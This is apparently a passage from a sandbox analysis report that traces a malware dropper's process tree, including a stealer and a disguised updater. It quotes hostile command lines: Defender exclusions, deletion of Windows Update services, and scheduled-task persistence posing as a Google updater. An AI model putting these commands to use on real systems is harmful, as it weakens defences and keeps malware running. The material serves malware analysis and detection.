Token: SeShutdownPrivilege	1920	powercfg.exe
Token: SeShutdownPrivilege	1040	powercfg.exe
Token: SeShutdownPrivilege	1584	powercfg.exe
Token: SeDebugPrivilege	2232	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	3008	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3008	WMIC.exe
Token: SeSecurityPrivilege	3008	WMIC.exe
Token: SeTakeOwnershipPrivilege	3008	WMIC.exe
Token: SeLoadDriverPrivilege	3008	WMIC.exe
Token: SeSystemtimePrivilege	3008	WMIC.exe
Token: SeBackupPrivilege	3008	WMIC.exe
Token: SeRestorePrivilege	3008	WMIC.exe
Token: SeShutdownPrivilege	3008	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3008	WMIC.exe
Token: SeUndockPrivilege	3008	WMIC.exe
Token: SeManageVolumePrivilege	3008	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3008	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3008	WMIC.exe
Token: SeSecurityPrivilege	3008	WMIC.exe
Token: SeTakeOwnershipPrivilege	3008	WMIC.exe
Token: SeLoadDriverPrivilege	3008	WMIC.exe
Token: SeSystemtimePrivilege	3008	WMIC.exe
Token: SeBackupPrivilege	3008	WMIC.exe
Token: SeRestorePrivilege	3008	WMIC.exe
Token: SeShutdownPrivilege	3008	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3008	WMIC.exe
Token: SeUndockPrivilege	3008	WMIC.exe
Token: SeManageVolumePrivilege	3008	WMIC.exe
Token: SeLockMemoryPrivilege	1084	conhost.exe
Token: 32	1244	avg_antivirus_free_setup_x64.exe
Token: SeDebugPrivilege	1244	avg_antivirus_free_setup_x64.exe
Token: SeDebugPrivilege	2812	instup.exe
Token: 32	2812	instup.exe
Token: SeDebugPrivilege	1304	instup.exe
Token: 32	1304	instup.exe
Token: SeShutdownPrivilege	2468	CCleanerSetup.exe
Token: SeShutdownPrivilege	2468	CCleanerSetup.exe
Token: SeRestorePrivilege	2468	CCleanerSetup.exe
Token: SeShutdownPrivilege	2028	CCUpdate.exe
Token: SeShutdownPrivilege	3008	CCUpdate.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2668	CheatEngine75.tmp
2844	CheatEngine75.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2576 wrote to memory of 2560	2576	9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe	31
PID 2576 wrote to memory of 2560	2576	9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe	31
PID 2576 wrote to memory of 2560	2576	9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe	31
PID 2576 wrote to memory of 2560	2576	9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe	31
PID 2576 wrote to memory of 2528	2576	9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe	32
PID 2576 wrote to memory of 2528	2576	9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe	32
PID 2576 wrote to memory of 2528	2576	9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe	32
PID 2576 wrote to memory of 2528	2576	9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe	32
PID 2528 wrote to memory of 2188	2528	VegaStealer_v2.exe	33
PID 2528 wrote to memory of 2188	2528	VegaStealer_v2.exe	33
PID 2528 wrote to memory of 2188	2528	VegaStealer_v2.exe	33
PID 2528 wrote to memory of 2188	2528	VegaStealer_v2.exe	33
PID 2576 wrote to memory of 2648	2576	9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe	34
PID 2576 wrote to memory of 2648	2576	9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe	34
PID 2576 wrote to memory of 2648	2576	9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe	34
PID 2576 wrote to memory of 2648	2576	9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe	34
PID 2648 wrote to memory of 2668	2648	CheatEngine75.exe	35
PID 2648 wrote to memory of 2668	2648	CheatEngine75.exe	35
PID 2648 wrote to memory of 2668	2648	CheatEngine75.exe	35
PID 2648 wrote to memory of 2668	2648	CheatEngine75.exe	35
PID 2648 wrote to memory of 2668	2648	CheatEngine75.exe	35
PID 2648 wrote to memory of 2668	2648	CheatEngine75.exe	35
PID 2648 wrote to memory of 2668	2648	CheatEngine75.exe	35
PID 2828 wrote to memory of 3000	2828	cmd.exe	44
PID 2828 wrote to memory of 3000	2828	cmd.exe	44
PID 2828 wrote to memory of 3000	2828	cmd.exe	44
PID 2848 wrote to memory of 2028	2848	cmd.exe	45
PID 2848 wrote to memory of 2028	2848	cmd.exe	45
PID 2848 wrote to memory of 2028	2848	cmd.exe	45
PID 2848 wrote to memory of 1524	2848	cmd.exe	46
PID 2848 wrote to memory of 1524	2848	cmd.exe	46
PID 2848 wrote to memory of 1524	2848	cmd.exe	46
PID 2828 wrote to memory of 1076	2828	cmd.exe	47
PID 2828 wrote to memory of 1076	2828	cmd.exe	47
PID 2828 wrote to memory of 1076	2828	cmd.exe	47
PID 2828 wrote to memory of 1136	2828	cmd.exe	48
PID 2828 wrote to memory of 1136	2828	cmd.exe	48
PID 2828 wrote to memory of 1136	2828	cmd.exe	48
PID 2848 wrote to memory of 756	2848	cmd.exe	49
PID 2848 wrote to memory of 756	2848	cmd.exe	49
PID 2848 wrote to memory of 756	2848	cmd.exe	49
PID 2828 wrote to memory of 2288	2828	cmd.exe	50
PID 2828 wrote to memory of 2288	2828	cmd.exe	50
PID 2828 wrote to memory of 2288	2828	cmd.exe	50
PID 2848 wrote to memory of 2604	2848	cmd.exe	51
PID 2848 wrote to memory of 2604	2848	cmd.exe	51
PID 2848 wrote to memory of 2604	2848	cmd.exe	51
PID 2848 wrote to memory of 332	2848	cmd.exe	52
PID 2848 wrote to memory of 332	2848	cmd.exe	52
PID 2848 wrote to memory of 332	2848	cmd.exe	52
PID 2860 wrote to memory of 1552	2860	powershell.exe	53
PID 2860 wrote to memory of 1552	2860	powershell.exe	53
PID 2860 wrote to memory of 1552	2860	powershell.exe	53
PID 2848 wrote to memory of 1808	2848	cmd.exe	54
PID 2848 wrote to memory of 1808	2848	cmd.exe	54
PID 2848 wrote to memory of 1808	2848	cmd.exe	54
PID 2848 wrote to memory of 2296	2848	cmd.exe	55
PID 2848 wrote to memory of 2296	2848	cmd.exe	55
PID 2848 wrote to memory of 2296	2848	cmd.exe	55
PID 2848 wrote to memory of 1944	2848	cmd.exe	56
PID 2848 wrote to memory of 1944	2848	cmd.exe	56
PID 2848 wrote to memory of 1944	2848	cmd.exe	56
PID 2848 wrote to memory of 1500	2848	cmd.exe	57
PID 2848 wrote to memory of 1500	2848	cmd.exe	57

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1248
- C:\Users\Admin\AppData\Local\Temp\9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe
  "C:\Users\Admin\AppData\Local\Temp\9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2576
- - C:\Users\Admin\AppData\Local\Temp\3.exe
    "C:\Users\Admin\AppData\Local\Temp\3.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2560
- - C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe
    "C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2528
  - - C:\Users\Admin\AppData\Local\Temp\v2.exe
      "C:\Users\Admin\AppData\Local\Temp\v2.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2188
- - C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe
    "C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2648
  - - C:\Users\Admin\AppData\Local\Temp\is-E34UK.tmp\CheatEngine75.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-E34UK.tmp\CheatEngine75.tmp" /SL5="$8014C,29079073,832512,C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Checks for any installed AV software in registry
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of FindShellTrayWindow
      PID:2668
    - - C:\Users\Admin\AppData\Local\Temp\is-UQABA.tmp\prod0_extract\avg_secure_browser_setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-UQABA.tmp\prod0_extract\avg_secure_browser_setup.exe" /s /run_source=avg_ads_is_control /is_pixel_psh=BjYV6dOmBzk0BywHjnkz6xB06OoC8C1iVp54FQCVZ2SX1NVRH9JrAaD6erckggUv31vIjx0dr5Z2mYx /make-default
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Checks for any installed AV software in registry
        Writes to the Master Boot Record (MBR)
        System Location Discovery: System Language Discovery
        
        PID:1164
    - - C:\Users\Admin\AppData\Local\Temp\is-UQABA.tmp\prod1_extract\avg_antivirus_free_setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-UQABA.tmp\prod1_extract\avg_antivirus_free_setup.exe" /silent /ws /psh:92pTu5hwBbWBVx42JRBqUjLe4ysWbhhILEpYHgQs2NLy2ZRvDwpcikLPsX1tBzDG5y094U52297tV7
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Writes to the Master Boot Record (MBR)
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        
        PID:2592
      - C:\Windows\Temp\asw.c4c26d9c3ee9b32b\avg_antivirus_free_setup_x64.exe
        
        "C:\Windows\Temp\asw.c4c26d9c3ee9b32b\avg_antivirus_free_setup_x64.exe" /silent /ws /psh:92pTu5hwBbWBVx42JRBqUjLe4ysWbhhILEpYHgQs2NLy2ZRvDwpcikLPsX1tBzDG5y094U52297tV7 /cookie:mmm_irs_ppi_902_451_o /ga_clientid:836f55f0-35e8-413d-ae2e-d6572e235344 /edat_dir:C:\Windows\Temp\asw.c4c26d9c3ee9b32b
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks for any installed AV software in registry
        Writes to the Master Boot Record (MBR)
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:1244
        
        C:\Windows\Temp\asw.0406649fa343c0dd\instup.exe
        
        "C:\Windows\Temp\asw.0406649fa343c0dd\instup.exe" /sfx:lite /sfxstorage:C:\Windows\Temp\asw.0406649fa343c0dd /edition:15 /prod:ais /stub_context:11ced6ce-41dc-4c03-8c2e-b841a5c1bba9:11216472 /guid:6332959d-1688-4166-8cd6-5e2293f8f6ed /ga_clientid:836f55f0-35e8-413d-ae2e-d6572e235344 /no_delayed_installation /silent /ws /psh:92pTu5hwBbWBVx42JRBqUjLe4ysWbhhILEpYHgQs2NLy2ZRvDwpcikLPsX1tBzDG5y094U52297tV7 /cookie:mmm_irs_ppi_902_451_o /ga_clientid:836f55f0-35e8-413d-ae2e-d6572e235344 /edat_dir:C:\Windows\Temp\asw.c4c26d9c3ee9b32b
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks for any installed AV software in registry
        Writes to the Master Boot Record (MBR)
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:2812
        
        C:\Windows\Temp\asw.0406649fa343c0dd\New_15020c62\instup.exe
        
        "C:\Windows\Temp\asw.0406649fa343c0dd\New_15020c62\instup.exe" /sfx /sfxstorage:C:\Windows\Temp\asw.0406649fa343c0dd /edition:15 /prod:ais /stub_context:11ced6ce-41dc-4c03-8c2e-b841a5c1bba9:11216472 /guid:6332959d-1688-4166-8cd6-5e2293f8f6ed /ga_clientid:836f55f0-35e8-413d-ae2e-d6572e235344 /no_delayed_installation /silent /ws /psh:92pTu5hwBbWBVx42JRBqUjLe4ysWbhhILEpYHgQs2NLy2ZRvDwpcikLPsX1tBzDG5y094U52297tV7 /cookie:mmm_irs_ppi_902_451_o /edat_dir:C:\Windows\Temp\asw.c4c26d9c3ee9b32b /online_installer
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Checks for any installed AV software in registry
        Writes to the Master Boot Record (MBR)
        Drops file in Program Files directory
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:1304
        
        C:\Windows\Temp\asw.0406649fa343c0dd\New_15020c62\sbr.exe
        
        "C:\Windows\Temp\asw.0406649fa343c0dd\New_15020c62\sbr.exe" 1304 "AVG Antivirus setup" "AVG Antivirus is being installed. Do not shut down your computer!"
        9⤵
        Executes dropped EXE
        
        PID:2336
    - - C:\Users\Admin\AppData\Local\Temp\is-UQABA.tmp\prod2_extract\CCleaner.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-UQABA.tmp\prod2_extract\CCleaner.exe" /S /PI=L
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1904
      - C:\Users\Admin\AppData\Local\Temp\nsz8E0F.tmp\CCleanerSetup.exe
        
        C:\Users\Admin\AppData\Local\Temp\nsz8E0F.tmp\CCleanerSetup.exe /install /S /PI=L
        6⤵
        Executes dropped EXE
        Writes to the Master Boot Record (MBR)
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Modifies data under HKEY_USERS
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:2468
        
        C:\Program Files\CCleaner\CCleaner64.exe
        
        "C:\Program Files\CCleaner\CCleaner64.exe" /createSkipUAC
        7⤵
        Executes dropped EXE
        
        PID:2780
        
        C:\Program Files\CCleaner\CCUpdate.exe
        
        "C:\Program Files\CCleaner\CCUpdate.exe" /reg
        7⤵
        Executes dropped EXE
        Writes to the Master Boot Record (MBR)
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2028
        
        C:\Program Files\CCleaner\CCUpdate.exe
        
        CCUpdate.exe /emupdater /applydll "C:\Program Files\CCleaner\Setup\f935a093-326e-4f81-8d44-f4f455c7709e.dll"
        8⤵
        Executes dropped EXE
        Writes to the Master Boot Record (MBR)
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3008
        
        C:\Program Files\CCleaner\CCleaner64.exe
        
        "C:\Program Files\CCleaner\CCleaner64.exe"
        7⤵
        Executes dropped EXE
        
        PID:1200
    - - C:\Users\Admin\AppData\Local\Temp\is-UQABA.tmp\CheatEngine75.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-UQABA.tmp\CheatEngine75.exe" /VERYSILENT /ZBDIST
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2016
      - C:\Users\Admin\AppData\Local\Temp\is-1TPDJ.tmp\CheatEngine75.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-1TPDJ.tmp\CheatEngine75.tmp" /SL5="$301E6,26511452,832512,C:\Users\Admin\AppData\Local\Temp\is-UQABA.tmp\CheatEngine75.exe" /VERYSILENT /ZBDIST
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:2844
        
        C:\Windows\system32\net.exe
        
        "net" stop BadlionAntic
        7⤵
        
        PID:3004
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop BadlionAntic
        8⤵
        
        PID:2572
        
        C:\Windows\system32\net.exe
        
        "net" stop BadlionAnticheat
        7⤵
        
        PID:1096
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop BadlionAnticheat
        8⤵
        
        PID:928
        
        C:\Windows\system32\sc.exe
        
        "sc" delete BadlionAntic
        7⤵
        Launches sc.exe
        
        PID:1036
        
        C:\Windows\system32\sc.exe
        
        "sc" delete BadlionAnticheat
        7⤵
        Launches sc.exe
        
        PID:1968
        
        C:\Users\Admin\AppData\Local\Temp\is-VJNPC.tmp\_isetup\_setup64.tmp
        
        helper 105 0x1F8
        7⤵
        Executes dropped EXE
        
        PID:348
        
        C:\Windows\system32\icacls.exe
        
        "icacls" "C:\Program Files\Cheat Engine 7.5" /grant *S-1-15-2-1:(OI)(CI)(RX)
        7⤵
        Modifies file permissions
        
        PID:2588
        
        C:\Program Files\Cheat Engine 7.5\Kernelmoduleunloader.exe
        
        "C:\Program Files\Cheat Engine 7.5\Kernelmoduleunloader.exe" /SETUP
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2872
        
        C:\Program Files\Cheat Engine 7.5\windowsrepair.exe
        
        "C:\Program Files\Cheat Engine 7.5\windowsrepair.exe" /s
        7⤵
        Executes dropped EXE
        
        PID:1380
        
        C:\Windows\system32\icacls.exe
        
        "icacls" "C:\Program Files\Cheat Engine 7.5" /grant *S-1-15-2-1:(OI)(CI)(RX)
        7⤵
        Modifies file permissions
        
        PID:1924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1084
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2848
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2028
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1524
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:756
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2604
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:332
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:1808
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:2296
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:1944
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:1500
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:1672
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of WriteProcessMemory
  PID:2828
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:3000
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1076
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1136
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2288
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2860
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2228
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1796
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:304
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1096
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:948
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1612
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1688
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3060
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:1072
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:1080
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:776
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:2932
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:912
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1748
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2572
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1920
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1040
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1584
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe ubulqosn
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  PID:1396
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  PID:2296
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  PID:1500
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    - Detects videocard installed
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:3008
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe vgyegivgfazcjxdl 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPrOXm4kGtEn/ZgPyjiDYwe/zRLKpUXs5FnM1Cz+lDKtsCEDVmxImOWutHy/wWAAF6uYRISXHrJSUiB0oBkYNVSVc+Z5TfdaGGtLWt9rhn1IwMTF8FurdYcS6sHeOOKov7n8fO9XzXfUsz+ohQT/DgIOyRpUwzATAbwxDv0BlAH+ISI2MOv7cXgWh/hEHn9UpTLH2AUxVXP8zWMLLWvPHAJe2SIfhjGncq3xQ+gVn+I4NKh77PPjDPgwHNzByaS5XiUtDR8Md5EhmkOEwD9v8Eh4nbJIewLTK837YGsKnb02yQo3e+jdFtCWzMfMeobPaXFvrKzv2emNNnxavmVO2FkfkcC1DvbnhN7NqgiVLh1FnuRerr7Rs9GSm8wk3eogEBuxtyJF/l7QvFFEn+PmzyQ6wNeX5T4KpCB8N2LdQ7qGf0xREtOLrL2we+R3IiFUCw/PgUnlB9aOUvPUntLmUYwnVg3n39kwuMDyHF7sntpqwSQW5ruNhQsPrhI9EqpLJ48=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1084

C:\Windows\system32\taskeng.exe
taskeng.exe {68CFF402-19BC-4CCD-B2F5-141CDAFDE5C0} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:2236
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  PID:2384
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
